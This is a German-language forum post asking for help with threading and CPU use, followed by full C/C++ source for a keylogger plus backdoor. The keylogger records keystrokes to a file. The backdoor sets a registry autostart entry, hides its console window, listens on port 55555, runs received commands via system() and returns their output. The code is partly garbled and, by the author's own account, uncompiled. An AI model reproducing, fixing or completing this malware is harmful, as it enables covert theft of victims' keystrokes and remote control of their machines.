Kurze info damits übersichtlicher wird, der keylogger ist gethreaded, dat backdoor ist main func...
Mein problem, eigentl. möchte ich mit dem keylogger 100% cpu auslastung erreichen, das mache ich weil ich ihn in einer while schleiße hängen lasse, und die ganze zeit den tastertur state abfrage(ohne eine sleep funktion), so nur hab ich jetz das prob, das ich es nicht schaffe, cpu auslastung ganz normal. ich hab mal den backdoor code auch mit dazugepackt, damit habt ihr nen bessren überblick über die thread funktionen.
der code hat eventuell noch ein paar syntaxfehler, hab das prog noch nicht compiliert, aber ich kann jetz schon sagen das ich die 100% cpu auslastung nicht bekommen, kann mir wer sagen wie ich das hinbekommen, obwohl der logger in nen thread läuft ?
hier mal der code:
Code:
#include <windows.h>
#include <process.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <time.h>
#include <conio.h>
#define NUM_ELEMENTS(x) *(sizeof((x)) / sizeof((x)[0])) * * * * * * * * * *
struct SThreadData
{
* DWORD * * * * * *dwAbortThread;
* CRITICAL_SECTION csCritical;
};
unsigned int __stdcall ThreadProc(void* pvParam)
{
* assert(pvParam); *
* SThreadData* pData = static_cast<SThreadData*>(pvParam);
* DWORD dwCheck;
* while(true)
* {
*
int idex;
char *buffer;
long LogLength;
long len;
FILE *log;
* log=fopen("c:\log.txt","a+");
* time_t theTime=time(0);
* fputs("\nLogged keys by cLog at: ", log);
* fputs(ctime(&theTime),log);
* fputs("-------------------------------------------------\n",log);
* fputs("~~~~~~~ © by CC_IP POWERED BY EXCLUDED.ORG ~~~~~~\n",log);
* fputs("-------------------------------------------------\n",log);
* fputs("\n",log);
* fclose(log);
log=fopen("c:\log.txt","a+");
* * * * * short character;
* * * * * * while(1)
* * * * * * { * * // yes not sleep here, --> 100% cpu !
* * * * * * * * * *for(character=8;character<=222;character++)
* * * * * * * * * *{
* * * * * * * * * * * *if(GetAsyncKeyState(character)==-32767)
* * * * * * * * * * * *{ *
* * * * * * * * * * * * * *FILE *log;
* * * * * * * * * * * * * *log=fopen("C:\log.txt","a+");
* * * * * * * * * * * * * *if(log==NULL)
* * * * * * * * * * * * * *{
* * * * * * * * * * * * * * * * * *return 1;
* * * * * * * * * * * * * *} * * * * * *
* * * * * * * * * * * * * *if(log!=NULL)
* * * * * * * * * * * * * *{ * * * *
* * * * * * * * * * * * * * * * * *if((character>=39)&&(character<=64))
* * * * * * * * * * * * * * * * * *{
* * * * * * * * * * * * * * * * * * * * *fputc(character,log);
* * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * *} * * * *
* * * * * * * * * * * * * * * * * *else if((character>64)&&(character<91))
* * * * * * * * * * * * * * * * * *{
* * * * * * * * * * * * * * * * * * * * *character+=32;
* * * * * * * * * * * * * * * * * * * * *fputc(character,log);
* * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * *}
* * * * * * * * * * * * * * * * * *else
* * * * * * * * * * * * * * * * * *{
* * * * * * * * * * * * * * * * * * * *switch(character)
* * * * * * * * * * * * * * * * * * * *{
* * * * * * * * * * * * * * * * * * * * * * *case 187:
* * * * * * * * * * * * * * * * * * * * * * *fputc('+',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case 188:
* * * * * * * * * * * * * * * * * * * * * * *fputc(',',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case 189:
* * * * * * * * * * * * * * * * * * * * * * *fputc('-',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case 190:
* * * * * * * * * * * * * * * * * * * * * * *fputc('.',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD0:
* * * * * * * * * * * * * * * * * * * * * * *fputc('0',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD1:
* * * * * * * * * * * * * * * * * * * * * * *fputc('1',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD2:
* * * * * * * * * * * * * * * * * * * * * * *fputc('2',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD3:
* * * * * * * * * * * * * * * * * * * * * * *fputc('3',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD4:
* * * * * * * * * * * * * * * * * * * * * * *fputc('4',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD5:
* * * * * * * * * * * * * * * * * * * * * * *fputc('5',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD6:
* * * * * * * * * * * * * * * * * * * * * * *fputc('6',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD7:
* * * * * * * * * * * * * * * * * * * * * * *fputc('7',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD8:
* * * * * * * * * * * * * * * * * * * * * * *fputc('8',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD9:
* * * * * * * * * * * * * * * * * * * * * * *fputc('9',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_CAPITAL:
* * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[CAPS LOCK]\r\n",log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_SHIFT:
* * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[SHIFT]\r\n",log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *case VK_SPACE:
* * * * * * * * * * * * * * * * * * * * * * *fputc(' ',log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break; * *
* * * * * * * * * * * * * * * * * * * * * * *case VK_CONTROL:
* * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[CTRL]\r\n",log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *break; * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * *case VK_RETURN:
* * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[RETURN]\r\n",log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_BACK:
* * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[BACKSPACE]\r\n",log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_TAB:
* * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[TAB]\r\n",log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *case VK_DELETE:
* * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[DELETE]\r\n",log);
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * * * * *default:
* * * * * * * * * * * * * * * * * * * * * * *fclose(log);
* * * * * * * * * * * * * * * * * * * * * * *break;
* * * * * * * * * * * * * * * * * * * } * * * *
* * * * * * * * * * * * * * * * *} * *
* * * * * * * * * * * * * * } * * * *
* * * * * * * * * } * *
* * * * * * * } * * * * * * * * *
* * * * * *FILE *log;
* * * * * log=fopen("c:\log.txt","rb");
* * * * * fseek(log,0,SEEK_END); * * * * * * * *
* * * * * len=ftell(log); * * * * * * * * *
* * * * * if(len>=LogLength)
* * * * * *{
* * * * * * fseek(log,0,SEEK_SET);
* * * * * * buffer=(char *)malloc(len);
* * * * * * idex=fread(buffer,1,len,log);//
* * * * * * buffer[idex] = '<!--POST BOX-->'; * * * * * * *
* * * * * * fclose(log);
* * * * * * log=fopen("c:\log.txt","w");
* * * * * * }
* * * * *
* * * * * *fclose(log);
*}
* * * * * *free (buffer);
* * *EnterCriticalSection(&pData->csCritical);
* * *dwCheck = pData->dwAbortThread;
* * *LeaveCriticalSection(&pData->csCritical);
* * *if(dwCheck)
* * * *break;
* }
* return (0);
}
int main()
{
* SThreadData data;
* data.dwAbortThread = FALSE;
* InitializeCriticalSection(&data.csCritical);
*
* HANDLE hThread = reinterpret_cast<HANDLE>(_beginthreadex(NULL, 0, ThreadProc, &data, 0, NULL));
* while(!kbhit())
*
int startWinsock(void);
* long rc;
* * *SOCKET acceptSocket;
* * *SOCKET connectedSocket;
* * *SOCKADDR_IN addr;
* * *char buf[256];
* * *char buf2[300];
*HKEY hkey;
*HKEY KEY = HKEY_LOCAL_MACHINE;
*char place[100]= {"Software\Microsoft\Windows\CurrentVersion\Run"};
*char name[100]= {"Autostart"};
*char value[100]= {"C:\Programme\n32s.exe"};
*RegOpenKeyEx(KEY,(LPCTSTR)place,0, KEY_ALL_ACCESS,&hkey);
*RegSetValueEx(hkey, name, 0, REG_SZ, (BYTE *)value, strlen(value));
*RegCloseKey(hkey);
struct hostent* h;
*WSADATA wsaData;
*UCHAR * ucAddress[4];
*CHAR * *szAddressInfo[64];
*CHAR * *szHostName[MAX_PATH];
* *WSAStartup(MAKEWORD(1, 1), &wsaData);
* *if(SOCKET_ERROR != gethostname(szHostName, NUM_ELEMENTS(szHostName)))
* *{
* * * *if(NULL != (h = gethostbyname(szHostName)))
* * * *{
* * * * * *for(unsigned x = 0; (h->h_addr_list[x]); x++)
* * * * * *{
* * * * * * * *ucAddress[0] = h->h_addr_list[x][0];
* * * * * * * *ucAddress[1] = h->h_addr_list[x][1];
* * * * * * * *ucAddress[2] = h->h_addr_list[x][2];
* * * * * * * *ucAddress[3] = h->h_addr_list[x][3];
* * * * * *}
* * * *}
* *}
* *WSACleanup();
*rc = startWinsock();
* *HWND hwnd = FindWindow("ConsoleWindowClass",NULL);
* ShowWindow(hwnd,SW_HIDE);
* * *printf("W32 Server © CC_IP 2006\n");
* * *if(rc!=0)
* * * {
* * * *printf("\code: %d\n",rc);
* * * return 1;
* * * }
* * * else
* * * {
* * * printf("\nWinsock startup ok!\n");
* * * }
* * acceptSocket=socket(AF_INET,SOCK_STREAM,0);
* * * * if(acceptSocket==INVALID_SOCKET)
* * * * {
* * * * printf("\code: %d\n",WSAGetLastError());
* * * * return 1;
* * * * }
* * * * else
* * * * {
* * * * printf("\nSocket created!\n");
* * * * }
* memset(&addr,0,sizeof(SOCKADDR_IN));
* addr.sin_family=AF_INET;
* addr.sin_port=htons(55555);
* addr.sin_addr.s_addr=inet_addr(szAddressInfo);
* rc=bind(acceptSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
* if(rc==SOCKET_ERROR)
* *{
* * *printf("\ncode: %d\n",WSAGetLastError());
* * *}
* * *else
* * *{
* * *printf("\nSocket bound on port 555555\n");
* * *}
* * *rc=listen(acceptSocket,10);
* * *if(rc==SOCKET_ERROR)
* * *{
* * *printf("\code: %d",WSAGetLastError());
* * *}
* * *else
* * *{
* * *printf("\listenmode\n");
* * *}
* * *connectedSocket=accept(acceptSocket,NULL,NULL);
* * *if(connectedSocket==INVALID_SOCKET)
* * * {
* * * * printf("code: %d\n", WSAGetLastError());
* * * * }
* * * * else
* * * * {
* * * * printf("New connection\n");
* * * * }
*while(rc!=SOCKET_ERROR)
*{
* *rc=recv(connectedSocket,buf,256,0);
* *if(rc==0)
* *{
* * *printf("connection lost\n");
* * *break;
* *}
* *if(rc==SOCKET_ERROR)
* *{
* * *printf("code: %d\n",WSAGetLastError());
* * *break;
* *}
* *buf[rc+9]='<!--POST BOX-->';
* *buf[rc]='>';
* *buf[rc+1]='c';
* *buf[rc+2]=':';
* *buf[rc+3]='\';
* *buf[rc+4]='a';
* *buf[rc+5]='.';
* *buf[rc+6]='t';
* *buf[rc+7]='x';
* *buf[rc+8]='t';
* *system(buf);
* *FILE * pFile;
*long lSize;
*char * buffer;
*pFile = fopen ( "c:\a.txt" , "rb" );
*if (pFile==NULL) exit (1);
*fseek (pFile , 0 , SEEK_END);
*lSize = ftell (pFile);
*rewind (pFile);
*buffer = (char*) malloc (lSize);
*if (buffer == NULL) exit (2);
*fread (buffer,1,lSize,pFile);
*fclose (pFile);
*free (buffer);
* * * rc=send(connectedSocket,buffer,strlen(buffer),0);
*closesocket(acceptSocket);
*closesocket(connectedSocket);
* * * * * }
* * *int startWinsock(void)
* * * {
* *WSADATA wsa;
* *return WSAStartup(MAKEWORD(2,0),&wsa);
* * *}
* EnterCriticalSection(&data.csCritical);
* data.dwAbortThread = TRUE;
* LeaveCriticalSection(&data.csCritical);
*
* WaitForSingleObject(hThread, INFINITE);
* CloseHandle(hThread);
* DeleteCriticalSection(&data.csCritical);
* return (0);
}
).edit: evtl versuch ichs mal zu compiliern wenn ich daheim bin, in der arbeit mögen es die it-leute immer ned so gerne, wenn man auf registrierten ports (1025-49152) dienste laufen lässt...
